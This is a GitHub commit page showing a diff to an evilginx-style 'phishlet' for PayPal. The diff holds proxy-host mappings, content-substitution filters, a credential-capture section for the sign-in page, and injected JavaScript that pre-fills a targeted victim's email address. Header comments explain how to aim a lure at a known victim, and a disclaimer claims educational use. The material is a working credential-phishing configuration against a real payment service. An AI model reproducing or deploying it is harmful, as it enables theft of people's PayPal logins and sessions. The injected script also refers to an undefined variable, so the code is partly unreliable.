Skip to content

Commit

Permalink
Added Email Javascript
Browse files Browse the repository at this point in the history
  • Loading branch information
@An0nUD4Y @kgretzky
An0nUD4Y authored and kgretzky committed Feb 2, 2021
1 parent d180987 commit 6a72205
Showing 1 changed file with 22 additions and 0 deletions.
22 changes: 22 additions & 0 deletions phishlets/paypal.yaml
View file
Original file line number Diff line number Diff line change
@@ -1,11 +1,16 @@
# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
# PLEASE DO NOT MISUSE THIS PHISHLET.

# Email Params can be Triggered By using Below Command.
# lures edit params ID [email protected]
# Where ID is lure id number, and [email protected] is your known victim account email address for paypal.

author: '@An0nud4y'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'www', orig_sub: 'www', domain: 'paypal.com', session: true, is_landing: true, auto_filter: true}
- {phish_sub: '', orig_sub: '', domain: 'paypal.com', session: true, is_landing: false, auto_filter: true}
# - {phish_sub: 'paypalobjects', orig_sub: 'www', domain: 'paypalobjects.com', session: false, is_landing: false}
- {phish_sub: 'c', orig_sub: 'c', domain: 'paypal.com', session: false, is_landing: false}
- {phish_sub: 'b.stats', orig_sub: 'b.stats', domain: 'paypal.com', session: false, is_landing: false}
- {phish_sub: 't', orig_sub: 't', domain: 'paypal.com', session: false, is_landing: false}
Expand All @@ -15,6 +20,8 @@ proxy_hosts:
sub_filters:
- {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
# - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
# - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
- {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
Expand Down Expand Up @@ -46,3 +53,18 @@ credentials:
login:
domain: 'www.paypal.com'
path: '/signin'

js_inject:
- trigger_domains: ["www.paypal.com"]
trigger_paths: ["/signin"]
trigger_params: ["email"]
script: |
function lp(){
var email = document.querySelector("#email");
if (email != null && password != null) {
email.value = "{email}";
return;
}
setTimeout(function(){lp();}, 100);
}
setTimeout(function(){lp();}, 100);

0 comments on commit 6a72205

Please sign in to comment.